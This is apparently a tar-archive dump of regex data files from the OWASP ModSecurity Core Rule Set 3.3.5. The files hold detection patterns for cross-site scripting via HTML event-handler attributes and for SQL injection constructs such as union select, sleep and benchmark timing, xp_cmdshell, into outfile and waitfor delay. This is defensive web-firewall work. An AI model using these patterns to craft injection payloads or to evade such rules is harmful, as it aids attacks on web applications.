(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?= 
(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?= 
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942120.data���������������������������������������0000664�0000000�0000000�00000000336�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\!\= \&\& \|\| >> << >= <= <> <=> \bxor\b \bregexp\b regexp\s+binary \bisnull\b \brlike\b rlike\s+binary not\s+between\s+0\s+and is\s+null like\s+null ^in[+\s]*\([\s\d\"]+[^()]*\) \Win[+\s]*\([\s\d\"]+[^()]*\) <>\s+binary 
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942130.data���������������������������������������0000664�0000000�0000000�00000002120�14461225151�0023577�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+ 
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942140.data���������������������������������������0000664�0000000�0000000�00000000566�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������database\W*\( db_name\W*\( information_schema\b master\.\.sysdatabases\b msdb\b msysaccessobjects\b msysaccessstorage\b msysaccessxml\b msysaces\b msysmodules2\b msysmodules\b msysobjects\b msysqueries\b msysrelationships\b mysql\.db\b northwind\b pg_catalog\b pg_toast\b schema_name\b schema\W*\( sqlite_master\b sqlite_temp_master\b sysaux\b sys\.database_name\b tempdb\b ������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942150.data���������������������������������������0000664�0000000�0000000�00000003675�14461225151�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos adddate addtime 
aes_decrypt aes_encrypt ascii asciistr asin atan atan2 avg benchmark bin bin_to_num bit_and bit_count bit_length bit_or bit_xor cast ciel cieling char_length char character_length charset chr coalesce coercibility collation compress concat_ws concat connection_id conv convert_tz convert cos cot count dcount cr32 curdate current_date current_time current_timestamp current_user curtime database date date_add date_format date_sub datediff day dayname dayofmonth dayofweek dayofyear decode default degrees des_decrypt des_encrypt dump elt encode encrypt exp export_set extract extractvalue field field_in_set find_in_set floor format found_rows from_base64 from_days from_unixtime get_format get_lock greatest group_concat hex hextoraw rawtohex hour if ifnull in inet6_aton inet6_ntoa inet_aton inet_ntoa insert instr interval isnull is_free_lock is_ipv4_compat is_ipv4_mapped is_ipv4 is_ipv6 is_not_null is_not is_null is_used_lock last last_day last_inser_id lcase least left length ln load_file local localtimestamp locate log log2 log10 lower lpad ltrim make_set makedate master_pos_wait max md5 microsecond mid min minute mod month monthname name_const not_in now nullif oct octet_length old_password ord password period_add period_diff pi position pow power procedure_analyse quarter quote radians rand release_lock repeat replace reverse right round row_count rpad rtrim schema sec_to_time second session_user sha sha1 sha2 sign sin pg_sleep sleep soundex space sqrt std stddev_pop stddev_samp str_to_date strcmp subdate substring substring_index substr subtime sum sysdate system_user tan time timestamp timestampadd timestampdiff timediff time_format time_to_sec to_base64 todays toseconds tochar tonchar trim truncate ucase uncompress uncompressed_length unhex unix_timestamp updatexml upper user utc_date utc_time utc_timestamp uuid uuid_short values var_pop var_samp variance version week weekday weekofyear weight_string year yearweek xmltype 
�������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942170.data���������������������������������������0000664�0000000�0000000�00000000313�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������select\s+benchmark\s*?\(\s*?[(]?\s*?\w+ ;\s+benchmark\s*?\(\s*?[(]?\s*?\w+ select\s+if\s*?\(\s*?[(]?\s*?\w+ ;\s+if\s*?\(\s*?[(]?\s*?\w+ select\s+sleep\s*?\(\s*?[(]?\s*?\w+ ;\s+sleep\s*?\(\s*?[(]?\s*?\w+ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942180.data���������������������������������������0000664�0000000�0000000�00000001203�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\d[\"'`]\s+[\"'`]\s+\d ^admin\s*?[\"'`] (?:/\*)+[\"'`]+\s? 
(?:/\*)+[\"'`]+\s?-- (?:/\*)+[\"'`]+\s?# (?:/\*)+[\"'`]+\s?/\* (?:/\*)+[\"'`]+\s?{ [\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?[^\w\s]?=\s*?[\"'`] [\"'`]\W*?[+=]+\W*?[\"'`] [\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$ [\"'`]\s*?[!=|][\d\s!=]+.*?\d+$ [\"'`]\s*?like\W+[\w\"'`(] \sis\s*?0\W where\s[\s\w\.,-]+\s= [\"'`][<>~]+[\"'`] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942190.data���������������������������������������0000664�0000000�0000000�00000000722�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?!\s*?[\"'`\w] [\"'`];?\s*?having\b\s*?[^\s] [\"'`];?\s*?select\b\s*?[^\s] [\"'`];?\s*?union\b\s*?[^\s] \s*?exec.*?\Wxp_cmdshell \s*?execute.*?\Wxp_cmdshell \wiif\s*?\( connection_id\s*?\([^\)]*? current_user\s*?\([^\)]*? database\s*?\([^\)]*? exec\s+master\. execute\s+master\. from\W+information_schema\W into[\s+]+dumpfile\s*?[\"'`] into[\s+]+outfile\s*?[\"'`] schema\s*?\([^\)]*? select.*?\w?user\( union select @ union[\w(\s]*?select user\s*?\([^\)]*? 
����������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942200.data���������������������������������������0000664�0000000�0000000�00000000620�14461225151�0023600�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`] ,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z ,.*?[)\da-f\"'`][\"'`][^\"'`]+ \Wselect.+\W*?from select\s*?\(\s*?space\s*?\( create\s*?\(\s*?space\s*?\( rename\s*?\(\s*?space\s*?\( truncate\s*?\(\s*?space\s*?\( load\s*?\(\s*?space\s*?\( alter\s*?\(\s*?space\s*?\( delete\s*?\(\s*?space\s*?\( update\s*?\(\s*?space\s*?\( insert\s*?\(\s*?space\s*?\( desc\s*?\(\s*?space\s*?\( ����������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942210.data���������������������������������������0000664�0000000�0000000�00000002014�14461225151�0023600�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������@.+=\s*?\(\s*?select \d\s*?or\s*?\d+\s*?[\-+] \d\s*?xor\s*?\d+\s*?[\-+] \d\s*?div\s*?\d+\s*?[\-+] \d\s*?like\s*?\d+\s*?[\-+] \d\s*?between\s*?\d+\s*?[\-+] \d\s*?and\s*?\d+\s*?[\-+] \/\w+;?\s+having\W \/\w+;?\s+and\W \/\w+;?\s+or\W \/\w+;?\s+xor\W \/\w+;?\s+div\W \/\w+;?\s+like\W \/\w+;?\s+between\W \/\w+;?\s+select\W \d\s+group\s+by.+\( ;\s*?drop #\s*?drop --\s*?drop ;\s*?alter #\s*?alter --\s*?alter 
;\s*?update\s*?\w{2,} #\s*?update\s*?\w{2,} --\s*?update\s*?\w{2,} ;\s*?insert\s*?\w{2,} #\s*?insert\s*?\w{2,} --\s*?insert\s*?\w{2,} [^\w]SET\s*?@\w+ and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] \|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] \&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942240.data���������������������������������������0000664�0000000�0000000�00000000244�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������alter\s*?\w+.*?character\s+set\s+\w+ alter\s*?\w+.*?char\s+set\s+\w+ [\"'`];*?\s*?waitfor\s+time\s+[\"'`] [\"'`];*?\s*?waitfor\s+delay\s+[\"'`] [\"'`];.*?:\s*?goto 
